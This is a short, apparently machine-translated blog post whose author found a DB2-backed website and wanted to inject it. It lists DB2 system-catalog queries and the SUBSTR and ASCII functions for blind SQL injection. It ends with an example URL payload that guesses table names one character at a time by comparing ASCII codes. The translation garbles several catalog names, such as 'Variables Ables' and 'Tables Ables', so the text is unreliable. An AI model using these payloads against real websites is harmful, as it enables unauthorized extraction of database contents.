There are fewer people using DB2. Today I met a DB2 website for injection and wanted to try it. However, it is difficult to find relevant information on the Internet, so I had to study it myself.
I have summarized the following articles by referring to the IBM DB2 document:
1. select NAME from SYSIBM. Variables Ables where CREATOR = USER
Returns the table names created by all users in the system.
2. select NAME from SYSIBM. SYSCOLUMNS where TBCREATOR = ''and TBNAME =''
Returns the column name in the table.
3. select NAME from SYSIBM. Tables Ables where CREATOR = user fetch first 1 ROWS ONLY
This is the most critical part. The first record is returned, similar to top 1 in SQL server.
4. SUBSTR (string, position, length)
Returns a substring of a string, similar to a mid
5. ASCII.
With these statements and functions, we can easily guess all the table names, field names, and data in the ascii semi-division method.
For example, to determine whether the ascii code of the first character of the name of the first table is greater than 50:
Http: // *. com? Test. jsp? Id = 1 and (select ASCII (SUBSTR (NAME, 1, 1) from SYSIBM. Tables Ables where CREATOR = user fetch first 1 rows only)> 50 --
Http://blog.waynedeng.com/blogview.asp? LogID = 543